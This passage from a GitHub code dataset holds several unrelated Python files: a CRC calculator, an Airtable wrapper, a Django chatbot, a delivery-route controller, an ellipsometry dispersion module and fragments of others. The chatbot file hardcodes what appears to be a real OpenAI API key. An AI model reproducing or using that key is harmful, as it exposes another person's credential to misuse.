test:DatasetWithAuxiliaryEmbeddings, display=True):\r\n import matplotlib.pyplot as plt\r\n\r\n err_char_lst = []\r\n for probs, txt_ids, mask in zip(seq_probs, test.inputs['input_ids'], test.inputs['attention_mask']):\r\n txt_ids = txt_ids.masked_select(mask.bool())\r\n err_idx = np.argwhere(probs[:txt_ids.size(-1), 1] > probs[:txt_ids.size(-1), 0]).flatten()\r\n err_chars = test.tokenizer.convert_ids_to_tokens(txt_ids[err_idx])\r\n if display:\r\n print(' '.join(test.tokenizer.convert_ids_to_tokens(txt_ids)))\r\n print(err_chars)\r\n err_char_lst.append(err_chars)\r\n if display:\r\n masks = test.inputs['attention_mask'].cpu().numpy()\r\n max_len = masks.sum(1).max()\r\n seq_probs_masked = seq_probs[..., 1] * masks\r\n plt.figure(figsize=(20, 1))\r\n plt.imshow(seq_probs_masked[:, :max_len], cmap='binary')\r\n return err_char_lst\r\n ","repo_name":"holajoa/chinese-grammar-error-detection","sub_path":"pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":13388,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"53948579556","text":"import os\nimport sys\n\n# macro\nCRC_LEN = 7\nCRC_INIT = int(\"0x00\", 16)\nCRC_POLY = int(\"0x89\", 16)\n\n# file\nif len(sys.argv) != 2:\n print(\"Error: argument 'only one file name' not meet!\")\n exit(0)\nwith open(sys.argv[1]) as f:\n # label\n print(\"File: %s, open success!\" % sys.argv[1])\n # get bit num\n bit_num = f.readline()\n bit_num = bit_num.strip()\n bit_num = int(bit_num)\n # get byte num\n if (bit_num & 7) == 0:\n byte_num = int(bit_num/8) + 0\n else:\n byte_num = int(bit_num/8) + 1\n print(\"bit_num: %d, byte_num: %d\" % (bit_num, byte_num))\n # read byte\n dat = []\n for i in range(byte_num):\n 
line = int(f.readline().strip(), 16)\n dat.append(line)\n# dat\nprint(dat)\n# crc\ncrc = CRC_INIT\nfor i in range(bit_num):\n # get idx\n bit_idx = 7 - i%8 # msb first\n byte_idx = int(i/8)\n # din\n din = (dat[byte_idx] >> bit_idx) & 1\n # crc\n crc = (crc << 1) + din;\n msb = (crc >> CRC_LEN) & 1\n if msb == 1:\n crc = crc ^ CRC_POLY\n# padding\nfor i in range(CRC_LEN):\n din = 0\n crc = (crc << 1) + din\n msb = (crc >> CRC_LEN) & 1\n if msb == 1:\n crc = crc ^ CRC_POLY\nprint(\"crc: \", hex(crc))\n\n\n\n\n\n","repo_name":"zwm/crc","sub_path":"crc.py","file_name":"crc.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"23573010789","text":"from airtable import Airtable\nfrom datetime import datetime, timedelta, timezone\nimport json\nfrom pathlib import Path\nimport os\n\nAIRTABLE_API_KEY = os.environ['AIRTABLE_API_KEY']\nAIRTABLE_M4C_BASE_KEY = os.environ['AIRTABLE_M4C_BASE_KEY']\n\nwith open(Path(__file__).parent / 'applahkO2yeDOzBFB.json') as f:\n base_schema = json.load(f)\n\nnon_writable_column_types = ['formula', 'lookup', 'multipleAttachment']\n \ndef parse_airtable_timestamp(date_str):\n do = datetime.strptime(date_str, '%Y-%m-%dT%H:%M:%S.000Z')\n return do.replace(tzinfo=timezone.utc)\n\n\ntables = [\n ('tbl88dJxsFd7fcTH2', 'Maker Production'),\n ('tblBGSTm13uFTcw5S', 'Users'),\n ('tblV01D6PysZMnjdn', 'Maker Information'),\n ('tblyRQF7ekQsGQauh', 'Key Locations'), \n]\n\nid2name = { id: name for id, name in tables } \nname2id = { name: id for id, name in tables }\n\n\nclass MyAirtable(Airtable):\n \n def __init__(self, base_key, table_id, api_key):\n Airtable.__init__(self, base_key, table_id, api_key)\n self.schema = base_schema[table_id]\n \n @property\n def columns(self):\n columns_array = self.schema['columns']\n columns_dict = { col['name']: col for col in columns_array }\n return columns_dict\n\n @property\n def writable_columns(self):\n return {k: v for k, v in self.columns.items() if v['type'] not in non_writable_column_types}\n \n def get_writables(self, record_id):\n record = self.get(record_id)\n fields = record['fields']\n cols = self.writable_columns\n # cols_dict = { col['name']: col for col in cols }\n writable_fields = { k : v for k, v in fields.items() if k in cols}\n record['fields'] = writable_fields\n return record\n\n def update_writables(self, record_id, fields, typecast=False): \n \"\"\"\n \n automatically skip those fields that can not be updated (e.g., formula, lookup)\n \n \"\"\"\n \n cols = self.writable_columns\n cols_dict = { col['name']: col for col in cols }\n writable_fields = { k : v for k, v in fields.items() if k in cols_dict}\n \n Airtable.update(self, record_id, writable_fields, typecast)\n \n def get_modified_since(self, datetime_since):\n \n modified_records = []\n\n def convert_last_modified_time(record):\n last_modified_time = record['fields']['Last modified time']\n datetime_last_modified = parse_airtable_timestamp(last_modified_time)\n record['fields']['Last modified time'] = datetime_last_modified\n\n def is_modified_since_last_sync(record):\n last_modified_time = record['fields']['Last modified time']\n # datetime_last_modified = parse_airtable_timestamp(last_modified_time)\n if datetime_since:\n return last_modified_time > datetime_since \n else:\n return True\n\n for page in self.get_iter(page_size = 20, sort = [('Last modified time', 'desc')]):\n for record in page:\n convert_last_modified_time(record)\n if not 
is_modified_since_last_sync(record):\n return modified_records\n\n modified_records.append(record)\n\n return modified_records \n \n def rename_readonly_fields(self, record):\n \n columns_dict = { col['name']: col for col in self.columns }\n\n new_record = {\n 'id': record['id'],\n 'fields': {}\n }\n for k, v in record['fields'].items():\n if columns_dict.get(k) and columns_dict[k]['type'] in non_writable_column_types:\n k1 = '$' + k\n else:\n k1 = k\n new_record['fields'][k1] = v\n return new_record\n\nclass M4CBase:\n\n def __init__(self):\n \n self.maker_information = MyAirtable(AIRTABLE_M4C_BASE_KEY, 'tblV01D6PysZMnjdn', api_key=AIRTABLE_API_KEY)\n self.users = MyAirtable(AIRTABLE_M4C_BASE_KEY, 'tblBGSTm13uFTcw5S', api_key=AIRTABLE_API_KEY)\n self.maker_production = MyAirtable(AIRTABLE_M4C_BASE_KEY, 'tbl88dJxsFd7fcTH2', api_key=AIRTABLE_API_KEY)\n self.maker_supply_requests = MyAirtable(AIRTABLE_M4C_BASE_KEY, 'tblAS9hFkRwkwwHqj', api_key=AIRTABLE_API_KEY)\n self.shipping = MyAirtable(AIRTABLE_M4C_BASE_KEY, 'tblCnJGc2lRohQSMi', api_key=AIRTABLE_API_KEY)\n self.equipment_requests = MyAirtable(AIRTABLE_M4C_BASE_KEY, 'tbl6yaV3QsOjAnoIq', api_key=AIRTABLE_API_KEY)\n self.key_locations = MyAirtable(AIRTABLE_M4C_BASE_KEY, 'tblyRQF7ekQsGQauh', api_key=AIRTABLE_API_KEY)\n self.messages = MyAirtable(AIRTABLE_M4C_BASE_KEY, 'tblxeZ6CrHQgTwRbC', api_key=AIRTABLE_API_KEY)\n self.regions = MyAirtable(AIRTABLE_M4C_BASE_KEY, 'tbl6Q1WRJVatjOJsc', api_key=AIRTABLE_API_KEY)\n \n @property\n def tables(self):\n return {\n 'Users': self.users, \n 'Maker Information': self.maker_information,\n 'Maker Production': self.maker_production,\n 'Maker Supply Requests': self.maker_supply_requests,\n 'Equipment Requests':self.equipment_requests,\n 'Shipping': self.shipping,\n 'Key Locations': self.key_locations,\n 'Messages': self.messages\n } \n","repo_name":"make4covid/services","sub_path":"m4c/base/m4c_base.py","file_name":"m4c_base.py","file_ext":"py","file_size_in_byte":5297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70070607690","text":"import openai\nfrom django.shortcuts import render\nfrom .models import ChatbotMessage\nopenai.api_key = \"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\" #GPT-3 API key\n\n\ndef chatbot_view(request):\n if request.method == 'POST':\n user_input = request.POST['user_input']\n # Generate chatbot response using GPT-3\n response = generate_response(user_input)\n # Save the user input and chatbot response to the database\n chatbot_message = ChatbotMessage(user_input=user_input, chatbot_response=response)\n chatbot_message.save()\n else:\n response = \"\"\n # Get the last 10 chatbot messages from the database\n chatbot_messages = ChatbotMessage.objects.order_by('-timestamp')[:10]\n context = {'response': response, 'chatbot_messages': chatbot_messages}\n return render(request, 'chatbot/chatbot.html', context)\n\n\ndef generate_response(user_input):\n prompt = f\"User: {user_input}\\nChatbot:\"\n response = openai.Completion.create(\n engine=\"text-davinci-003\",\n prompt=prompt,\n temperature=0.5,\n max_tokens=1024,\n top_p=1,\n frequency_penalty=0,\n presence_penalty=0,\n stop=[\"User:\"]\n )\n return response.choices[0].text.strip()\n\n\n# Define function to generate chatbot response\n# def generate_response(user_input, chat_history=None):\n# prompt = f\"You:{user_input}\\nDoctorAI:\"\n#\n# if chat_history:\n# prompt = f\"{chat_history}\\n{prompt}\"\n#\n# response = openai.Completion.create(\n# 
engine=\"davinci\",\n# prompt=prompt,\n# temperature=0.5,\n# max_tokens=1024,\n# top_p=1,\n# frequency_penalty=0,\n# presence_penalty=0,\n# stop=[\"User:\"]\n# )\n#\n# chat_history = f\"{prompt}{response.choices[0].text.strip()}\"\n#\n# return response.choices[0].text.strip(), chat_history","repo_name":"libomun/hs","sub_path":"apps/chat/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"37946135494","text":"# Jeremy Greenwood ----- ID#: 000917613\n# Mentor: Rebekah McBride\n# WGU C950 - Data Structures and Algorithms II\n# Performance Assessment: NHP1\n\nfrom datetime import timedelta\nfrom package import Status\n\n\nclass DeliveryController:\n # O(1)\n def __init__(self, route, table):\n \"\"\" Create Delivery Route Manager.\n\n :param route: Route\n :param table: HashTable \"\"\"\n self._route = route\n self._current_edge = self._route.order[0]\n self.event_time = self._route.get_start_time()\n self.total_mileage = 0\n self._table = table\n\n # O(n)^2\n def start_route(self):\n \"\"\" Initialize variables & advance next_node reference to Destination(). \"\"\"\n # set all packages in truck as OUT_FOR_DELIVERY\n for edge in self._route.order:\n node = edge.next_node\n for pkg in node.get_package_keys():\n package = self._table.search(pkg)\n package.ofd()\n # mark time for first delivery to execute\n self.event_time += timedelta(hours=float(self._current_edge.weight) / self._route.rate_of_travel)\n\n # O(n)\n def make_delivery(self, current_time):\n \"\"\" Mark packages as DELIVERED, set current_node, advance next_node.\n\n :param current_time: datetime \"\"\"\n # advance mileage to destination\n self.total_mileage += float(self._current_edge.weight)\n\n # mark packages at vertex as delivered\n for package in self._route.get_next_node().get_package_keys():\n pkg = self._table.search(package)\n pkg.deliver(self.event_time)\n\n # advance to next edge\n self._current_edge = self._route.get_next_edge()\n\n # update time of next delivery event\n self.event_time = current_time + timedelta(hours=float(self._current_edge.weight) / self._route.rate_of_travel)\n\n # if route is complete, mark finished\n if self._current_edge == self._route.order[len(self._route.order) - 1]:\n self.total_mileage += float(self._current_edge.weight)\n self._route.finish_route()\n\n # O(1)\n def alter_delivery(self, package, location, graph):\n \"\"\" Edit route.order to remove 1 vertex and add another.\n\n :param package: Package\n :param location: Vertex\n :param graph: Graph \"\"\"\n\n # remove package_key from old location\n old_location = package.address # get address\n old_location = self._route.get_vertex(old_location) # get obj reference\n old_location.del_package_key(str(package)) # alter keys\n\n\n # add package_key to new location\n package.address = location # update address\n new_location = graph.get_vertex(location) # get obj reference\n new_location.add_package_key(str(package)) # update keys\n\n if package.get_status() == Status(4):\n print('retrieve') # retrieve delivered package\n else:\n self._route.alter_course(new_location)\n","repo_name":"jgreenwd/WGU-classes","sub_path":"C950/delivery.py","file_name":"delivery.py","file_ext":"py","file_size_in_byte":3068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"34311020040","text":"import numpy as np\nimport os\nimport os.path\nimport glob\nfrom pathlib import 
PurePath\nimport scipy.fftpack as ft\n\n\nfrom refnx.analysis import (\n Parameters,\n possibly_create_parameter,\n sequence_to_parameters,\n)\n\nfrom .structureSE import ScattererSE, nm_eV_conversion\n\n\n# list of material dispersion curves distributed with refellips\n_pth = os.path.dirname(os.path.abspath(__file__))\n_material_files = glob.glob(os.path.join(_pth, \"materials/*.csv\"))\nmaterials = [os.path.basename(m)[:-4] for m in _material_files]\n\n\nclass RI(ScattererSE):\n \"\"\"\n Object representing a materials wavelength-dependent refractive index.\n\n An issue is that optical parameters are supplied in units of micrometers\n ('cause thats what seems to be used in refractive index repos and\n cauchy models), the wavelength of the incident radiation is supplied in\n nanometers (thats typical) and the fitting is done in angstroms. Very\n unpleasant.\n\n Parameters\n ----------\n dispersion : {str, Path, tuple, np.ndarray)\n If a string then a dispersion curve will be loaded from a file that\n the string points to. The file is assumed to be of CSV format, with the\n first column holding the wavelength (in *microns*), with the second\n column specifying the refractive index. An optional third column can be\n present that should hold the extinction coefficient.\n\n If `dispersion` has length 2 (float, float), then dispersion[0] points\n to the refractive index of the material and dispersion[1] points to the\n extinction coefficient. This refractive index is assumed to be\n wavelength independent.\n\n If `dispersion` has length 3, then dispersion[0], dispersion[1],\n dispersion[2] are assumed to hold arrays specifying the wavelength (in\n *microns*), refractive index, and extinction coefficient.\n wavelength : float\n default wavelength for calculation (nm)\n name : str, optional\n Name of material.\n\n Notes\n -----\n An RI object can be used to create a Slab\n \"\"\"\n\n def __init__(self, dispersion=None, wavelength=658, name=\"\"):\n super(RI, self).__init__(name=name, wavelength=wavelength)\n\n # _wav is only set if a wavelength dependent dispersion curve is loaded\n # assumed to be in nm\n self._wav = None\n self._RI = None\n self._EC = None\n\n if dispersion is None:\n raise RuntimeError(\"dispersion must be specified\")\n\n if dispersion is not None:\n if type(dispersion) is str or isinstance(dispersion, PurePath):\n if not len(name):\n # if there is no name get it from the path\n name = os.path.basename(dispersion).split(\".\")[0]\n\n vals = np.loadtxt(\n dispersion, skiprows=1, delimiter=\",\", encoding=\"utf8\"\n ).T\n self._wav = vals[0]\n self._RI = vals[1]\n self._EC = np.zeros_like(self._wav)\n if len(vals) == 3:\n self._EC = vals[2]\n # convert wavelength from um to nm\n self._wav = self._wav * 1000\n elif len(dispersion) == 2:\n self._RI, self._EC = dispersion\n elif len(dispersion) == 3:\n # this is if you have an (3, N) array or tuple specifying\n # wavelength, RI, extinction coef.\n # wavelength assumed to be in *nm*\n self._wav, self._RI, self._EC = dispersion\n self._wav *= 1000\n else:\n raise TypeError(\"format not recognised\")\n\n @property\n def parameters(self):\n return Parameters(name=self.name)\n\n def complex(self, wavelength):\n \"\"\"\n Calculate a complex RI\n\n Parameters\n ----------\n wavelength : float\n wavelength of light in nm\n\n Returns\n -------\n RI : complex\n refractive index and extinction coefficient\n \"\"\"\n wav = self.wavelength\n if np.any(wavelength):\n wav = wavelength\n\n if np.any(self._wav):\n # return a wavelength from a 
dispersion curve\n # TODO - raise a warning if the wavelength supplied is outside the\n # wavelength range covered by the data file.\n ri_real = np.interp(wav, self._wav, self._RI)\n ri_imag = np.interp(wav, self._wav, self._EC)\n return ri_real + 1j * ri_imag\n\n else:\n return self._RI + 1j * self._EC\n\n\ndef load_material(material):\n \"\"\"\n Loads a dispersion curve from a file distributed with refellips.\n\n Parameters\n ----------\n material: str\n One of the materials in ``refellips.materials``\n\n Returns\n -------\n ri: refellips.RI\n\n Notes\n -----\n To get a list of the dispersion curves distributed with refellips examine\n the entries in ``refellips.materials``.\n \"\"\"\n if material in materials:\n pth = os.path.join(_pth, \"materials\", f\"{material}.csv\")\n return RI(dispersion=pth)\n raise ValueError(f\"{material} is not in the list of dispersion curves\")\n\n\nclass Cauchy(ScattererSE):\n \"\"\"\n Cauchy model for wavelength-dependent refractive index.\n\n Optical parameters are supplied in units of micrometers\n ('cause thats what seems to be used in refractive index repos and\n cauchy models), the wavelength of the incident radiation is supplied in\n nanometers (that's typical) and the fitting is done in angstroms.\n\n The refractive index is calculated as:\n ``A + (B * 1000**2) / (wav**2) + (C * 1000**4) / (wav**4)``\n\n where the factors of 1000 convert from microns to nm.\n\n Parameters\n ----------\n A : float or parameter\n Cauchy parameter A.\n B : float or parameter\n Cauchy parameter B in um^2. Default 0.\n C : float or parameter\n Cauchy parameter C in um^4. Default 0.\n wavelength : float\n default wavelength for calculation (nm)\n name : str, optional\n Name of material.\n \"\"\"\n\n def __init__(self, A, B=0, C=0, wavelength=658, name=\"\"):\n super().__init__(name=name, wavelength=wavelength)\n self.A = possibly_create_parameter(A, name=f\"{name} - cauchy A\")\n self.B = possibly_create_parameter(B, name=f\"{name} - cauchy B\")\n self.C = possibly_create_parameter(C, name=f\"{name} - cauchy C\")\n self._parameters = Parameters(name=name)\n self._parameters.extend([self.A, self.B, self.C])\n\n @property\n def parameters(self):\n return self._parameters\n\n def complex(self, wavelength):\n \"\"\"\n Calculate a complex RI\n\n Parameters\n ----------\n wavelength : float\n wavelength of light in nm\n\n Returns\n -------\n RI : complex\n refractive index and extinction coefficient\n \"\"\"\n wav = self.wavelength\n if np.any(wavelength):\n wav = wavelength\n\n real = (\n self.A.value\n + (self.B.value * 1000**2) / (wav**2)\n + (self.C.value * 1000**4) / (wav**4)\n )\n return real + 1j * 0.0\n\n\nclass Sellmeier(ScattererSE):\n r\"\"\"\n Dispersion curves for Sellmeier oscillators.\n\n Parameters\n ----------\n Am: {float, Parameter}\n Amplitude of Sellmeier in μm.\n En: {float, Parameter}\n Center energy of oscillator in μm.\n P: {float, Parameter}\n Position of a pole in μm.\n Einf: {float, Parameter}\n Offset term\n wavelength : float\n default wavelength for calculation (nm)\n name : str, optional\n Name of material.\n\n Notes\n -----\n Calculates dispersion curves of a Sellmeier oscillator as implemented in\n CompleteEase.\n CompleteEase Manual, Chapter 9, pg 9-306, J.A. Woollam Co., 2014.\n\n .. 
math::\n\n n = \\sqrt{ \\varepsilon (\\infty) + \\frac{Am \\lambda^2}{\\lambda^2 - En^2} - P\\lambda^2}\n\n Examples\n --------\n >>> # Create a Sellmeier oscillator\n >>> sell = Sellmeier(2, 0.1, 0.11, Einf=1)\n >>> sell.complex(658) # calculates the refractive index at 658 nm.\n \"\"\"\n\n def __init__(self, Am, En, P, Einf=1, wavelength=658, name=\"\"):\n super().__init__(name=name, wavelength=wavelength)\n\n self.Am = possibly_create_parameter(Am, name=f\"{name} - sellmeier Am\")\n self.En = possibly_create_parameter(En, name=f\"{name} - sellmeier En\")\n self.P = possibly_create_parameter(P, name=f\"{name} - sellmeier P\")\n self.Einf = possibly_create_parameter(\n Einf, name=f\"{name} - sellmeier Einf\"\n )\n\n self._parameters = Parameters(name=name)\n self._parameters.extend([self.Am, self.En, self.P, self.Einf])\n\n @property\n def parameters(self):\n return self._parameters\n\n def complex(self, wavelength):\n \"\"\"\n Calculate a complex RI for the given Sellmeier oscillator\n\n Parameters\n ----------\n wavelength : float\n wavelength of light in nm\n\n Returns\n -------\n RI : complex\n refractive index and extinction coefficient\n \"\"\"\n wav = self.wavelength\n if np.any(wavelength):\n wav = wavelength\n\n # Convert between μm & nm (constants are typically given in μm)\n wav *= 1e-3\n\n real = np.sqrt(\n self.Einf.value\n + (self.Am.value * wav**2) / (wav**2 - self.En.value**2)\n - (self.P.value * wav**2)\n )\n return real + 1j * 0.0\n\n def epsilon(self, wavelength):\n \"\"\"\n The complex dielectric function for the oscillator\n \"\"\"\n wav = self.wavelength\n if np.any(wavelength):\n wav = wavelength\n\n # Convert between μm & nm (constants are typically given in μm)\n wav *= 1e-3\n\n real = (\n self.Einf.value\n + (self.Am.value * wav**2) / (wav**2 - self.En.value**2)\n - (self.P.value * wav**2)\n )\n\n return real + 1j * 0\n\n\nclass Lorentz(ScattererSE):\n r\"\"\"\n Dispersion curves for Lorentz oscillators.\n\n Parameters\n ----------\n Am: {float, Parameter, sequence}\n Amplitude of Lorentzian\n Br: {float, Parameter, sequence}\n Broadening of oscillator\n En: {float, Parameter, sequence}\n Centre energy of oscillator (eV)\n Einf: {float, Parameter}\n Offset term\n wavelength : float\n default wavelength for calculation (nm)\n name : str, optional\n Name of material.\n\n Notes\n -----\n Calculates dispersion curves for *k* oscillators, as implemented in WVASE.\n The model is Kramers-Kronig consistent.\n The parameters for constructing this object should have\n `len(Am) == len(Br) == len(En) == k`, or be single float/Parameter.\n\n ..math::\n\n \\tilde{\\varepsilon}(h\\nu)=\\varepsilon_{1\\infty }+\\sum_{k}\\frac{A_{k}}{E_{k}^2 - (h\\nu)^2-iB_kh\\nu}\n\n Examples\n --------\n >>> # Create a single Lorentz oscillator\n >>> Lorentz(5, 0.25, 2, Einf=1)\n >>> # Create a 2 oscillator dispersion curve\n >>> lo = Lorentz([5, 10], [0.25, 0.5], [2, 4], Einf=2)\n >>> lo.complex(658) # calculates the refractive index at 658 nm.\n \"\"\"\n\n def __init__(self, Am, Br, En, Einf=1, wavelength=658, name=\"\"):\n super().__init__(name=name, wavelength=wavelength)\n\n self._parameters = Parameters(name=name)\n self.Am = sequence_to_parameters([Am])\n self.Br = sequence_to_parameters([Br])\n self.En = sequence_to_parameters([En])\n if not (len(self.Am) == len(self.Br) == len(self.En)):\n raise ValueError(\"A, B, E all have to be the same length\")\n\n self._parameters.extend([self.Am, self.Br, self.En])\n self.Einf = possibly_create_parameter(Einf)\n 
self._parameters.append(self.Einf)\n\n @property\n def parameters(self):\n return self._parameters\n\n def epsilon(self, energy):\n \"\"\"\n The complex dielectric function for the oscillator\n \"\"\"\n A = np.array(self.Am)[:, None]\n B = np.array(self.Br)[:, None]\n E = np.array(self.En)[:, None]\n _e = np.asfarray(energy)\n v = A / (E**2 - _e**2 - 1j * B * _e)\n r = np.atleast_1d(np.sum(v, axis=0) + self.Einf.value)\n\n if np.isscalar(energy) and len(r) == 1:\n return r[0]\n\n return r\n\n\nclass Gauss(ScattererSE):\n \"\"\"\n Dispersion curves for Gaussian oscillators.\n\n Parameters\n ----------\n Am: {float, Parameter, sequence}\n Amplitude of Gaussian\n Br: {float, Parameter, sequence}\n Broadening of oscillator\n En: {float, Parameter, sequence}\n Centre energy of oscillator (eV)\n Einf: {float, Parameter}\n Offset term\n wavelength : float\n default wavelength for calculation (nm)\n name : str, optional\n Name of material.\n\n Notes\n -----\n Calculates dispersion curves for *k* Gaussian oscillators.\n The model is Kramers-Kronig consistent.\n The parameters for constructing this object should have\n `len(Am) == len(Br) == len(En) == k`, or be single float/Parameter.\n \"\"\"\n\n def __init__(self, Am, Br, En, Einf=1, wavelength=658, name=\"\"):\n super().__init__(name=name, wavelength=wavelength)\n\n self._parameters = Parameters(name=name)\n self.Am = sequence_to_parameters([Am])\n self.Br = sequence_to_parameters([Br])\n self.En = sequence_to_parameters([En])\n if not (len(self.Am) == len(self.Br) == len(self.En)):\n raise ValueError(\"A, B, E all have to be the same length\")\n\n self.Einf = possibly_create_parameter(Einf)\n self._parameters.extend([self.Am, self.Br, self.En])\n self._parameters.append(self.Einf)\n\n @property\n def parameters(self):\n return self._parameters\n\n def epsilon(self, energy):\n \"\"\"\n The complex dielectric function for the oscillator\n \"\"\"\n A = np.array(self.Am)[:, None]\n B = np.array(self.Br)[:, None]\n E = np.array(self.En)[:, None]\n energies = np.asfarray(energy)\n\n # TODO cache if params don't change\n _e_pad = np.linspace(-20, 20, 2048)\n sigma = B / 2 / np.sqrt(np.log(2))\n e2 = A * np.exp(-(((_e_pad - E) / sigma) ** 2))\n e2 -= A * np.exp(-(((_e_pad + E) / sigma) ** 2))\n\n # e1 is Kramers-Kronig consistent via Hilbert transform\n # e1 = ft.hilbert(e2) + self.Einf.value\n e1 = np.array([ft.hilbert(_e2) for _e2 in e2])\n\n e1 = np.sum(e1, axis=0) + self.Einf.value\n e2 = np.sum(e2, axis=0)\n\n # (linearly) interpolate to find epsilon at given energy\n _e1 = np.interp(energies, _e_pad, e1)\n _e2 = np.interp(energies, _e_pad, e2)\n r = np.atleast_1d(_e1 + 1j * _e2)\n if np.isscalar(energy) and len(r) == 1:\n return r[0]\n return r\n\n\nclass TaucLorentz(ScattererSE):\n \"\"\"\n Dispersion curves for Tauc-Lorentz oscillators. The model works well for\n amorphous materials in the visible range.\n\n Parameters\n ----------\n Am: {float, Parameter, sequence}\n Amplitude of absorption. Typically in [10, 200]\n C: {float, Parameter, sequence}\n Lorentz broadening of oscillator (eV). Typically in [0, 10].\n ``C`` should be less than ``2 * En``\n En: {float, Parameter, sequence}\n Lorentz resonance energy (eV). 
``En`` should be greater than ``Eg``.\n Eg: {float, Parameter}\n Common bandgap energy (eV) for all oscillators\n Einf: {float, Parameter}\n Offset term\n wavelength : float\n default wavelength for calculation (nm)\n name : str, optional\n Name of material\n\n Notes\n -----\n Calculates dispersion curves for *k* Tauc-Lorentz oscillators.\n The model is Kramers-Kronig consistent.\n The parameters for constructing this object should have\n `len(Am) == len(C) == len(En) == k`, or be single float/Parameter.\n\n Implemented using the equations from\n `Horiba technical note `_\n and also the WVASE manual and https://en.wikipedia.org/wiki/Tauc%E2%80%93Lorentz_model.\n\n The Horiba technical note gives parameters for many materials.\n\n * G.E. Jellision and F.A. Modine, Appl. Phys. Lett. 69 (3), 371-374 (1996)\n * Erratum, G.E. Jellison and F.A. Modine, Appl. Phys. Lett 69 (14), 2137 (1996)\n * H. Chen, W.Z. Shen, Eur. Phys. J. B. 43, 503-507 (2005)\n \"\"\"\n\n def __init__(self, Am, C, En, Eg, Einf=1, wavelength=658, name=\"\"):\n super().__init__(name=name, wavelength=wavelength)\n\n self._parameters = Parameters(name=name)\n self.Am = sequence_to_parameters([Am])\n self.C = sequence_to_parameters([C])\n self.En = sequence_to_parameters([En])\n if not (len(self.Am) == len(self.C) == len(self.En)):\n raise ValueError(\"A, B, E all have to be the same length\")\n\n self.Einf = possibly_create_parameter(Einf)\n self.Eg = possibly_create_parameter(Eg)\n self._parameters.extend([self.Am, self.C, self.En, self.Einf, self.Eg])\n\n @property\n def parameters(self):\n return self._parameters\n\n def epsilon(self, energy):\n \"\"\"\n The complex dielectric function for the oscillator\n \"\"\"\n A = np.array(self.Am)[:, None]\n C = np.array(self.C)[:, None]\n Ei = np.array(self.En)[:, None]\n Eg = self.Eg.value\n energies = np.asfarray(energy)\n\n a_ln = (\n (Eg**2 - Ei**2) * energies**2\n + Eg**2 * C**2\n - Ei**2 * (Ei**2 + 3 * Eg**2)\n )\n a_atan = (energies**2 - Ei**2) * (\n Ei**2 + Eg**2\n ) + Eg**2 * C**2\n alpha = np.sqrt(4 * Ei**2 - C**2)\n gamma = np.sqrt(Ei**2 - C**2 / 2)\n zeta4 = (energies**2 - gamma**2) ** 2 + 0.25 * alpha**2 * C**2\n\n e1 = (\n A\n * C\n * a_ln\n / 2\n / np.pi\n / zeta4\n / alpha\n / Ei\n * np.log(\n (Ei**2 + Eg**2 + alpha * Eg)\n / (Ei**2 + Eg**2 - alpha * Eg)\n )\n )\n e1 -= (\n A\n / np.pi\n * a_atan\n / zeta4\n / Ei\n * (\n np.pi\n - np.arctan((2 * Eg + alpha) / C)\n + np.arctan((alpha - 2 * Eg) / C)\n )\n )\n e1 += (\n 2\n * A\n * Ei\n * Eg\n * (energies**2 - gamma**2)\n / np.pi\n / zeta4\n / alpha\n * (np.pi + 2 * np.arctan(2 * (gamma**2 - Eg**2) / alpha / C))\n )\n e1 -= (\n A\n * Ei\n * C\n * (energies**2 + Eg**2)\n / np.pi\n / zeta4\n / energies\n * np.log(np.abs(energies - Eg) / (energies + Eg))\n )\n e1 += (\n 2\n * A\n * Ei\n * Eg\n * C\n / np.pi\n / zeta4\n * np.log(\n np.abs(energies - Eg)\n * (energies + Eg)\n / np.sqrt((Ei**2 - Eg**2) ** 2 + Eg**2 * C**2)\n )\n )\n e1 = np.sum(e1, axis=0) + self.Einf.value\n\n # I don't think the Hilbert Transform works all that well on this\n # dielectric function because the tail drops off v slowly.\n e2 = A * Ei * C * (energies - Eg) ** 2\n e2 /= energies * ((energies**2 - Ei**2) ** 2 + (C * energies) ** 2)\n e2 *= np.heaviside(energies - Eg, 0)\n e2 = np.sum(e2, axis=0)\n\n r = np.atleast_1d(e1 + 1j * e2)\n if np.isscalar(energy) and len(r) == 1:\n return r[0]\n return 
r\n","repo_name":"refnx/refellips","sub_path":"refellips/dispersion.py","file_name":"dispersion.py","file_ext":"py","file_size_in_byte":19878,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"} +{"seq_id":"23825827746","text":"#1. Objetivo - Criar um api que disponibiliza a consula, criação, edição e exclusão de livros.\r\n#2. URL base - localhost\r\n#3. Endpoints - \r\n #- localhost/livros (GET)\r\n #- localhost/livros (POST)\r\n #- localhost/livros/id (GET)\r\n #- Localhost/livros/id (PUT)\r\n #- localhost/livros (DELETE)\r\n#4. Quais recursos - Livros\r\n\r\nfrom flask import Flask, jsonify, request\r\n\r\napp = Flask(__name__)\r\n\r\nvendas = [\r\n\t{\r\n\t\t\"dia\":1,\r\n\t\t\"valor\": 22174.1664\r\n\t},\r\n\t{\r\n\t\t\"dia\": 2,\r\n\t\t\"valor\": 24537.6698\r\n\t},\r\n\t{\r\n\t\t\"dia\": 3,\r\n\t\t\"valor\": 26139.6134\r\n\t},\r\n\t{\r\n\t\t\"dia\": 4,\r\n\t\t\"valor\": 0.0\r\n\t},\r\n\t{\r\n\t\t\"dia\": 5,\r\n\t\t\"valor\": 0.0\r\n\t},\r\n\t{\r\n\t\t\"dia\": 6,\r\n\t\t\"valor\": 26742.6612\r\n\t},\r\n\t{\r\n\t\t\"dia\": 7,\r\n\t\t\"valor\": 0.0\r\n\t},\r\n\t{\r\n\t\t\"dia\": 8,\r\n\t\t\"valor\": 42889.2258\r\n\t},\r\n\t{\r\n\t\t\"dia\": 9,\r\n\t\t\"valor\": 46251.174\r\n\t},\r\n\t{\r\n\t\t\"dia\": 10,\r\n\t\t\"valor\": 11191.4722\r\n\t},\r\n\t{\r\n\t\t\"dia\": 11,\r\n\t\t\"valor\": 